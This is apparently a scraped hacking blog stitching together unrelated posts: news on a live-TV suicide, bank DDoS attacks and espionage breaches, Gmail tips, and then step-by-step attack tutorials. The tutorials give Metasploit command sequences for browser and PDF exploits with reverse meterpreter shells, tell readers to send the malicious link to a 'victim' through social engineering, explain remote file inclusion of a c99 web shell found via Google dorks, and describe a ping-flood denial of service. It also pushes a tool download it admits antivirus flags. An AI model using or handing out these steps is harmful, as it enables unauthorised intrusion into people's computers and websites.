Suicide on Live TV: Fox News Suicide | Man Carjacked People, Shot at Cops Before Shooting Himself on Live TV

The man whose suicide was broadcast live across the country on Fox News this afternoon had stolen a car in Phoenix and shot at police officers this morning, according to Phoenix police.

Phoenix police Sergeant Tommy Thompson tells New Times that police have not figured out who this man is yet, but police were after him for quite some time.

See also:
-Fox News Just Showed a Man Shoot Himself in the Head Outside of Phoenix on Live TV

Someone called police this morning, reporting that a man walking near 72nd Avenue and McDowell Road this morning had hit a car, although it's not clear exactly what he did to that car.

While officers were responding to that, the man somehow managed to rob people of their car -- not the same vehicle he damaged.

Police spotted him shortly after he stole the car, and after chasing the man for a while, police dropped back into "surveillance," Thompson says. Undercover vehicles and helicopters were following him at this point.

Near 44th Avenue and Roosevelt, two officers -- one inside an undercover vehicle, the other standing outside a second undercover vehicle -- were parked off to the side of the road. Thompson says the man drove to the other side of the road and shot at the officers before driving his car onto Interstate 10.

At least one car was hit with a bullet, but the officers themselves were not hit.

By the time the man drove out to around 500th Avenue, he exited the interstate, drove south, and started heading back east.

Fox News anchor Shepard Smith had to apologize on-air Friday afternoon after Fox aired a suicide live on national television. Smith explained there was an error in the network's delay system, which should have given a five-second buffer between any inappropriate footage and the viewing public.

In those five seconds, producers should have been able to turn the feed off and prevent it from reaching viewers. Unfortunately, that delay failed just as a man involved in a high-speed police chase in Arizona shot himself in the head after exiting his vehicle. At the time the unidentified man shot himself, the camera was trained squarely on him and nothing was censored.

Fox News executive VP Michael Clemente issued the following statement to the news media:

We took every precaution to avoid any such live incident by putting the helicopter pictures on a five second delay. Unfortunately, this mistake was the result of a severe human error and we apologize for what viewers ultimately saw on the screen.

Revenge For Mohammed Film: Islamic Hacker Group Hacked Websites Of U.S. Banks

A hacker group based in the Middle East has flaunted its online muscle against several of America’s largest financial firms, temporarily keeping customers from accessing their information on banking websites and promising similar shut downs again next week.

But while cyberattacks are routinely done to glean private account information, this threat appears different — it’s political.

The group — identifying itself as the Izz ad-Din al-Qassam Cyber Fighters — claimed responsibility in a post on Pastebin, a site used by hackers, according to The New York Times.

The group said the attacks are linked to the anti-Islam film that sparked deadly protests this month across the Muslim world.

“Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad,” the post said. “So as we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet.”

Websites of JPMorgan Chase, Citigroup and Bank of America were affected last week, while Wells Fargo’s website was hit Tuesday, U.S. Bank was affected Wednesday and PNC Financial Services was disrupted Thursday.

New version of Blackhole has added more obfuscation technologies to frustrate security professionals

The first Blackhole exploit kit was bad, but version 2.0 is starting to look even nastier. 

Websense Inc. recently reported they had sent a Russian-speaking undercover researcher to feel around for information on any updates to the kit. What he found in the code looked suspiciously like a new, improved version of the hacking tool. 

And now, according to Chris Astacio, manager of security research at Websense, they’re confident that Blackhole 2.0 has indeed arrived and is now going to be harder to detect.

Astacio said his company found two significant upgrades to Blackhole. The first is code that allows users to create their own custom URLs, rather than having to use a standard one. This makes it harder to identify the kit.

The second is the addition of IP blocking capabilities. Hackers can now keep an IP blacklist of anyone visiting the URL hosting the binary, rather than simply the people visiting the landing page.

This means that security professionals can more effectively be stymied in their efforts to download the binaries and examine them, he said.

The creator or creators of the Blackhole kit seem remarkably keen on changing the methods of obscuring it, he added. This doesn’t happen “anywhere near as often for other kits,” said Astacio. For example, the obfuscation for the Phoenix exploit kit is changed every time a new version emerges, roughly three to six times a year, whereas with Blackhole, “we’ve seen as often as one to two times a month,” he said.

If you’re a hacker selling exploit kits, this is simply good business sense. It allows campaigns to run longer by keeping them out of reach of security pros longer, he added.

Astacio would not discuss specifics of how members of his team get access to the underground sites where the kits can be downloaded, though he did say that some of the “more rich communities” with obscure types of kits have extensive vetting processes.

An undercover researcher would have to engage in a bit of “asset gathering” — finding someone who can vouch for them and get them in the door. After that, it’s just a matter of keeping your head down,” he said.

“Definitely you don’t want anybody within that forum to know that you’re a researcher, a security researcher at that,” Astacio said. If they do find out, retribution could come in the form of anything from simply kicking the person off the forum to “DDoSing their Web site that perhaps hosts a blog that releases information like this.”

But for the most part, researchers that do infiltrate these communities are protected well enough by the sheer number of people, hackers or not, viewing the site, Astacio said.

As for protecting yourself, as an Internet user, from constantly changing exploit kits like Blackhole, Astacio advises being vigilant about updating and patching your system.

“The most important thing that people can do to keep themselves safe from these kits is absolutely keep… all of their plugins up to date — so your PDM [portable document management] viewer, your Flash viewer, as well as Java, of course, being the most important one.”

“As long as you keep all your Web-based software up to date on your computer you should be fine.”

But sometimes, with threats like the recently discovered zero-day vulnerability in Java, that isn’t enough, he said. Those kinds of dangers can only be identified by security firms, like his own, which are constantly examining the content of malicious sites, he said.

SOURCE:  Canadian IT News

SCADA: Telvent's Corporate Network Hacked | China to blame?

SCADA software maker, Telvent Canada, Ltd, a subsidiary of Schneider-Electric, confirms that its corporate network was compromised and files used by customers were also accessed.

Telvent Canada (www.telvent.com), a provider of SCADA software and other real-time tools for the utility and oil and gas industries, revealed in a recent letter to customers that a recent intrusion to its netowork had been executed by a Chinese group, called the Comment Group.Telvent Canada has contacted customers to warn them that a hacker or hackers breached its system, installed malware and stole files relating to OASysS SCADA. Brian Krebs, who made the story public, notes that this is an industrial control system designed for “smart grids” that track and respond to changes in demand.

Telvent itself says the system” ensures reliability by managing the distribution network and maintaining its operational integrity. It plays a central role in Smart Grid self-healing network architecture and improves overall grid safety and security.

Telvent's parent company, Schneider Electric (www.schneider-electric.com) released a statement. Martin Hanna, a spokesman for Schneider Electric, said, "that the company had alerted customers to the attack and that there was no evidence the attackers ever had the ability to access customers' networks. Telvent is aware of a security breach of its corporate network that has affected some customer files. Customers have been informed and are taking recommended actions, with the support of Telvent teams. Telvent is actively working with law enforcement, security specialists and its affected customers to ensure the breach has been contained,"

The recent attack coincided with the Telvent announcement of a partnership with Industrial Defender on Sept 12. Industrial Defender offers a product called Automation Systems Manager (ASM), which collects and analyzes data from software applicaitons that provide a clear view of critical control applications.

Indian Naval Critical Data Transmitted to China

Every officer of the Indian Air Force (IAF) will now have to sign a declaration that they will not save or view any official document on personal computers. Failure to adhere to this directive will lead to a court marshal and prosecution.

The recent directive from the IAF headquarters to all its formations across the country comes after repeated leaks of sensitive documents - some of which are of operational and sensitive in nature - from personal computers of officers and men.

In a recent case, operational documents were found on the personal computer of a young pilot posted at an airbase in Tamil Nadu. A court of inquiry has been initiated.

In another incident this July, it was found that classified data regarding Indian Naval operations were transmitted to IP addresses in China. Later, inquiries revealed that a few naval officers had, against the rules, taken copies of the plans in pen drives from a naval computer, to study. The Chinese-made pen drives allegedly had malwares which transmitted the data back to IP addresses in China once they were used on computers connected to the internet.

Earlier last year, a major with the Indian Army posted in the crucial Andaman and Nicobar Command was investigated by the Intelligence Bureau (IB) and the National Investigative Agency (NIA) when classified Army plans and other sensitive operational data stored in his personal computer reached Pakistan's Inter-Services Intelligence Agency (ISI). The inquiry revealed that the Major was preparing for a course, and had taken copies of presentations and plans in his personal computer, which was subsequently hacked by malware originating from Pakistan.

In almost every case of cyber leak, subsequent inquiries have revealed that officers wanting to study the documents at leisure copied the data from the official systems into their personal computers, and the data later found its way into the cyberspace.

Over the years, cyberspace has emerged as a critical frontier for espionage as the use of computers and dependence on the internet has grown. Thus, document security has emerged as one of critical areas of concern for the government. It is perhaps alluding to these increasing instances of the cyberspace being used by foreign agencies to collect critical information. Prime Minister Manmohan Singh, while addressing top cops of the country at the annual security conference hosted by the Intelligence Bureau earlier this month, said, "Our country's vulnerability to cybercrime is escalating... Large-scale computer attacks on our critical infrastructure and economy can have potentially devastating results. The government is working on a robust cyber security structure."

The Indian armed forces are considering a joint cyber command to deal with document security and hackers, many of whom are funded and used by foreign governments searching for sensitive and strategic information. The Indian Navy has come up with an exclusive Information Technology brigade to be deployed on warships and various sensitive establishments on shore to manage and secure the network and data.

As a general rule, computers in which sensitive information are stored or prepared are never connected to the internet. "The IAF internal communication network, for instance, is not only a stand-alone network with no connection to the net, but also has the system configured in such a way that it doesn't allow external storage devices like pen drives or CDs," a senior MoD official told NDTV. Nonetheless, some officers have been found "keeping copies or preparing documents using critical information in their personal computers, which have subsequently passed out by malwares in the system or hacked," the officer added.

3 Best Gmail Tips: How to Use Custom Gmail Addresses | How to Use Gmail as a Hard Drive | How to access GMAIL without Internet

Use Custom Gmail Addresses

You can make up an unlimited number of arbitrary email addresses to use. You can use all these addresses when making a purchase online or want to track a conversation or anything else.These email addresses you can create using plus-addressing.

Simply append a plus sign (+) and any string of letters or numbers (meaningful to you). For e.g. my mail id is amarjitsingh1984@gmail.com. Now I can create as many custom emails as I can. For all my online shopping’s, I am using amarjitsingh1984+shopping@gmail.com and to follow any comments stream online I am using amarjitsingh1984+comments@gmail.com. I can further create subtags such as amarjitsingh1984+News+hacking@gmail.com & amarjitsingh+News+cricket@gmail.com.

The magic of these email address is that all plus-addressed emails I am receiving to my mail id amarjitsingh1984@gmail.com itself only. Here I can use filters and labels in Gmail inbox as per my convenience.

Some of my favorite uses of plus-addressing are:

· Informing my mates for biking trip: I am inviting all my Venturous Bikers Team usingamarjitsingh1984+bikers@gmail.com and copying myself a copy to keep track. To finalize a trip, it takes around 20-30 days, so I can easily keep track all emails.

· Subscribing News Letters: All my newsletters I subscribed using unique mail ID. For e.g. useamarjitsingh1984+quickonlinetips@gmail.com to subscribe www.quickonlinetips.com newsletter & using amarjitsingh1984+hacking@gmail.com to subscribe hacking sites news letter.

Use Gmail as a Hard Drive

GMail Drive (http://www.viksoe.dk/code/gmail.htm) provides 2+ gigabytes of storage allotted to your Gmail account right onto your desktop. It looks and feels just like a regular hard drive, and it’s not available locally of course. This drive is networked.

Open http://www.viksoe.dk/code/gmail.htm and in download section, you will see Gmail Drive. Download it and install.

Enter your Gmail username and password and click the OK button to log in. Your drive will be ready to use. Simply drag and drop the data and files to and fro between your local drive and GMail Drive.

NOTE: Mac OS X (10.3 or above) users should check out the freely available gDisk (http://gdisk.sourceforge.net) that adds a Gmail-powered drive to your desktop.

TIP: Using this Gdrive, no need to stick with pendrive or any other external drive. Go to your friend’s place, open Grive and copy paste the required data. Now come back to you system and open it. SO SIMPLE.

How to access GMAIL without Internet

Using this gmail tool, you can access all you gmail mails even when you are not connected with internet also. Similarly like we are using outlook for or official purpose, you can use gmail. All you mail you send while offline will be placed in you outbox and automatically send when you connected to internet.

Once you turn on this feature, you need to download gmail gears on your system. As long as you stay connected with internet, this gear will continuously synchronize the cache on local system with gmail server .

Just follow these steps to get started:

· Click Settings and click the offline tab in your gmail inbox.

· Select Enable next to Offline Gmail.

· Click Save Changes.

· A POP up window will open asking to install gmail gears on your system. Click install

· After your browser reloads, you'll see a new "Offline" link in green in the upper righth corner of your account, next to your username. Click this link to start the offline set up process and download Gears if you don't already have it.

Too lazy to say Thanks or comment here? Why not too lazy to read my post?? If you like this post and want us to post similar articles, Pls give us a feedback and leave a comment here.

How to Hack Windows 7 using Metaspolit

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement

metasploit

Windows 7

Open terminal type

msfconsole

use auxiliary/server/browser_autopwn

show options


Now set LHOST, PORT and URIPATH

Msf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your computer )

Msf auxiliary(browser_autppwn) > set port 4444 (The default port of your Metasploit program)

Msf auxiliary(browser_autppwn) > set uripath /

Msf auxiliary(browser_autppwn) > exploit (to launch a exploit on targeted machine)

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets

0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement

Attacker: metasploit

Victim PC: Windows 7

Open terminal type

msfconsole

use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit


Now an URL you should give to your victim http://192.168.1.4/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote XP using Heap Overflow Attack

This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now an URL you should give to your victim http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Windows XP using Shell Link Code Execution

This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement

Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6(IP of Local Host)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6(This must be an address on the local machine)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath /(The Url to use for this exploit)

Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit

Now an URL you should give to your victim http://192.168.1.6/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC with Operation Aurora Attack

Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows vista, windows 7, windows server 2008

Requirement

Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_002_aurora

Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)

Msf exploit (ms10_002_aurora)>exploit

Now an URL you should give to your victim http://192.168.1.4/meeting

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement

Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
 

When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripathfinalreport(The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http://192.168.1.3/finalreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC using Sun Java Command Line Injection

Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/java_ws_vmargs

Msf exploit(java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath /(The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Now an URL you should give to your victim http://192.168.1.3/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Hack Remote PC using pdf

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement

Attacker: metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Redirect Site to Another Site

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com"
replace yahoo.com with your preferred site and then enter it

How to Do Remote File Inclusion?

Remote File Inclusion (RFI)occurs when a remote file, usually a shell(a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s  default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their webapplications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website..


1.First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers us Google dorks to locate servers vulnerable to RFI. A Google dork i the act of using Google’s provided search tools to help get a specific search result.

2.Website that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName

3.To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com

4.If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.

5.A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will
display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

6.Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

7.In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dorkwould be: allinurl:.php?page=. This looks for URL’s with .php?page=in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try
switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.comfor already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

8.If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell butthis time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.

9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

3 Best Tips before you do Google Searching again

Google queries are not case sensitive: Google doesn’t care if you type your query in lowercase letters (hackers), uppercase (HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always regarded the same way.This is especially important when you’researching things like source code listings, when the case of the term carries a great deal of meaning for the programmer.The one notable exception is the word or. When used as the Boolean operator, or must be written in uppercase, as OR.

Google wildcards: Google’s concept of wildcards is not the same as a programmer’s concept of wildcards. Most consider wildcards to be either a symbolic representation of any single letter (UNIX fans may think of the question mark) or any series of letters represented by an asterisk. This type of technique is called stemming. Google’s wildcard, the asterisk

(*), represents nothing more than a single word in a search phrase. Using an asterisk at the beginning or end of a word will not provide you any more hits than using the word by itself.

Google reserves the right to ignore you: Google ignores certain common words, characters, and single digits in a search.These are sometimes called stop words. When Google ignores any of your search terms, you will be notified on the results page, just below the query box. Some common stop words include who, where, what, the, a, or an. Curiously enough, the logic for word exclusion can vary from search to search.

Learn How to Create your own SMS channel on Google to update your latest posts through SMS

I have created 3 channels for my 3 blogs as cited below:

Learn Free Ethical Hacking: http://labs.google.co.in/smschannels/subscribe/LearnFreeHacking

Venturous Bikers: http://labs.google.co.in/smschannels/subscribe/VenturousBikers

Change & Stress Management: http://labs.google.co.in/smschannels/subscribe/ChangeandStressManagement

Step 1: Open this link on your browser http://labs.google.co.in/smschannels/browse

Step 2: Before subscribing to or creating an SMS Channel, you need to select a nickname and verify your mobile number.

Step 3: Give you nick name and mobile number and click on "send verification code". You will receive an SMS with verification code. Enter verification code and click on finish setup.

Step 4: To subscribe available channels, click on subscribe button.
Step 5: To Create your own channel and to alert your friends in real time through SMS CLICK HERE. You can create your own channel(s) to receive regular alerts over SMS on specific topics that interest you. You can also invite others to subscribe to your channel(s). You can use your channel(s) as a discussion group as well, allowing other people to post messages.

Step 6: After filling all the information, click on create channel

Adobe Announced Security Breach: Code-Signing Server Hacked | Hacking News & Cyber Updates: 28th Sept 10 PM

City of Lumberton's website hacked Sacramento Bee LUMBERTON, N.C. -- The city of Lumberton's website has been hacked for more than two hours by someone who said he was a Turkish Muslim. Lumberton information management director Travis Branch says someone embedded a message on the city's ... See all stories on this topic »

US Bank, PNC hacked, report website problems WZZM (AP) - Two more major American banks, U.S. Bank and PNC, reported problems with their customer websites Wednesday after a financial services security group warned  about possible cyberattacks. U.S. Bank spokesman Tom Joyce said some customers ... See all stories on this topic »

Philippine websites hacked over cybercrime law Phys.Org The group calling itself "Anonymous Philippines" hacked websites for the central bank, the Manila water service and other agencies to say the bill, which was signed  into law earlier this month, violated people's rights. "The Philippine government has ... See all stories on this topic »

Sarasota employees hacked police network, consultant says Sarasota Herald-Tribune The report of a secret electronic link between City Hall and the law enforcement network — where confidential records and security databases are supposed to be guarded —  adds a new wrinkle to an investigation that has already triggered the city ... See all stories on this topic »

Facebook and Gates Foundation host education hackathon CNET "At Facebook, we believe that a more open and connected world can have a big impact in addressing some of society's biggest issues," the social network wrote in a blog post about "HackEd" today. "Nowhere is that opportunity more clear than education."... See all stories on this topic »

Lumberton website hacked, person claiming to be Turkish Muslim posts message Fayetteville Observer LUMBERTON - The city of Lumberton's website was hacked Wednesday night by someone who says he is a Turkish Muslim and goes by the name SlyHacker. A message was embedded over the city's site about 10:30 p.m., said Travis Branch, director of the ... See all stories on this topic »

Prison CCTV System has been Hacked by a Worm Named Conficker SPAMfighter News The famous conficker worm have hacked all the computers that control closed circuit television (CCTV) system of an unknown prison, as published by softpedia.com on September 19, 2012. Representatives from the correctional institutions were adamant that ... See all stories on this topic »

Cybercrime: Islamist group claims it hacked Wells Fargo site Equities.com Cybercrime: Islamist group claims it hacked Wells Fargo site. Dominic Rushe in New York Guardian. US banking company Wells Fargo is believed to have become the latest victim of a cyber attack launched by a group pledging retaliation for the Innocence ... See all stories on this topic »

Zynga Games Lose A Couple Hundred Thousand Fans In The Facebook Fake ... Kotaku Australia Facebook has implemented countermeasures to purge fake, forged, hacked or otherwise unsavory 'Likes' from its pages, resulting in the sudden departure of several hundred  thousand of Zynga's several hundred million fans. The 'Like' is a powerful unit of ... See all stories on this topic »

Cops: Hampton Bays Man Stole $9600 With Computer Patch.com 19, saying he hacked into a someone's personal bank account and helped himself to $9,600. Police said 28-year-old Matthew Rewinski was charged with grand larceny in the  third degree and two counts of computer tampering in the first degree, both ... See all stories on this topic »

Adobe finds a code-signing server has been hacked - The Next Web By Emil Protalinski Adobe today announced it has been subject to a significant security breach, including a compromised build server resulting in at least one valid Adobe code signing certificate being used maliciously. As a result, the software company will be ... The Next Web

DOS ATTACK ON WEBSITE.

DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT.
PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &PRESS ENTER.

OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE COMMAND.BUT IT`S OLD METHOD , SO I RECOMMEND YOU TO USE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.

IT HAS EXPLAINED EVERYTHING. CLICK HERE.

How to Find i.p Address of Remote computer?

This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.

Before proceeding lets know something about IP address.

0x01-What is IP address?

